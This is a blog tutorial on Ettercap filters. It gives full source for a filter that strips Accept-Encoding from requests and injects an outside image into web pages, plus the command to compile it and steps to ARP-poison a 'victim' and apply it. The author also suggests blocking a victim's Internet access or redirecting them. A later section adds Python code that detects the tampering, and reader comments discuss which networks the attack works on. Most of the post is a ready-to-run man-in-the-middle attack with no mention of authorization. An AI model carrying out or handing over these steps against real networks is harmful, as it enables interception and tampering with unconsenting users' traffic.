Fun With Ettercap Filters !!!!!!!

In one of my previous posts I explained how to use Ettercap. In this tutorial I will explain how to use Ettercap filters. If you have not read the previous article, please go through it before reading this one.

Things we need


1. Ettercap on a Linux box, to compile filters ("I will be using Backtrack for this tutorial")

Procedure

1. First, copy and paste the following source code into a text file and save it as ig.filter

# ################################################
# Jolly Pwned -- ig.filter -- filter source file ##
#By Irongeek. based on code from ALoR & NaGA ######
# Along with some help from Kev and jon.dmml #####
# credits --- irongeek ............. #############
# ################################################

# Requests going to a web server (destination port 80)
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      # overwrite the header name so the server replies uncompressed
      # note: replacement string is same length as original string
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("zapped Accept-Encoding!\n");
   }
}
# Responses coming back from a web server (source port 80)
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

2. The above source code was written by Irongeek. Let's have a look at the source code:
  • The code should be pretty self-explanatory to anyone who has done much coding before (it's very much like C and other languages).
  • Lines starting with the # symbol are comments.
  • The second "if" statement tells the filter to work only on TCP packets from source port 80, in other words packets coming from a web server.
  • This test may still miss some images, but should get most of them. I'm also not sure about Ettercap's order of operation with AND (&&) and OR (||) statements but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators but this gave me compile errors).  
  • The "replace" function replaces the first parameter string with the second.
  • Because of the way this string replacement works, it will mangle image tags and insert the picture we desire into the web page's HTML before the page is returned to the victim.

The tags may end up looking something like the following:

                <img src="http://www.irongeek.com/images/jollypwn.png" /images/original-image.jpg>

        The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The "msg" function just prints to the screen, letting us know that the filter has fired off. Now that we sort of understand the basics of the filter, let's compile it.


3. To compile the filter, open a new terminal and enter
etterfilter ig.filter -o ig.ef

where
ig.filter is the file which we created in the previous step
ig.ef is the compiled output file (the filter)


4. Now open Ettercap, ARP poison the victim and start sniffing (I have already explained this in my previous article).

5. Now open Filters by going to Filter ---> apply filter, as shown



6. Now select the filter which we created, "ig.ef", and click OK



7. Now when the victim opens any web page, he will see the pictures as shown below



Cool, huh? Keep in mind that this filter does not seem to fire off for all images; it's a little hit and miss.
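From the defender's side, both rewrites made by ig.filter leave marks that can be checked for. The following is an added example (not part of the original post or of Irongeek's filter): it looks for the overwritten header name in a request as the web server receives it, and for img tags where a quoted src is followed by a leftover value with no attribute name. The function names and sample inputs are constructed for illustration.

```python
import re

# Header name that the page's ig.filter writes over "Accept-Encoding".
REWRITTEN_HEADER = "accept-rubbish!"

IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
# A quoted src value followed by a second value that has no attribute name:
# a quoted string, a path starting with "/", or a bare image file name.
ORPHAN = re.compile(
    r'''src\s*=\s*"(?P<shown>[^"]*)"\s+
        (?P<leftover>"[^">]*"|'[^'>]*'
                     |/[^\s>/][^\s>]*
                     |[^\s"'=>/]+\.(?:png|jpe?g|gif)(?=[\s/>]))''',
    re.IGNORECASE | re.VERBOSE,
)

def request_was_rewritten(raw_request):
    """True if a raw HTTP request carries the overwritten header name."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    names = {line.split(":", 1)[0].strip().lower()
             for line in head.split("\r\n")[1:] if ":" in line}
    return REWRITTEN_HEADER in names

def mangled_images(html):
    """Return (displayed_src, leftover_original) for each mangled img tag."""
    hits = []
    for tag in IMG_TAG.findall(html):
        m = ORPHAN.search(tag)
        if m:
            hits.append((m.group("shown"), m.group("leftover").strip("\"'")))
    return hits

# Constructed samples: a request as the server would receive it, and a page
# as the client would receive it, after the filter has run.
SAMPLE_REQUEST = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
                  "Accept-Rubbish!: gzip, deflate\r\n\r\n")
SAMPLE_HTML = ('<img src="http://www.irongeek.com/images/jollypwn.png" '
               '/images/original-image.jpg>'
               '<img src="/images/logo.png" alt="logo" />')

if __name__ == "__main__":
    print(request_was_rewritten(SAMPLE_REQUEST))
    print(mangled_images(SAMPLE_HTML))
```

The filter only touches plain HTTP on port 80, so pages served over HTTPS never pass through these replacements in readable form.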

Can I Write My Own Filters?
Yes, you can write your own filters. You can do some funny stuff like blocking the Internet connection, or redirecting the victim to another website, and much more; it's left to your imagination. For more information on things you can do with Ettercap filters, look at the sample code in the file "etter.filter.examples" that comes along with Ettercap. On my box this file is located in /usr/share/ettercap/etter.filter.examples

Hope you enjoyed this post! If you have any doubts, please feel free to post a comment!


Anonymous

is this only for LAN connection?

Anonymous

LAN, WLAN, and sometimes VPN/WAN

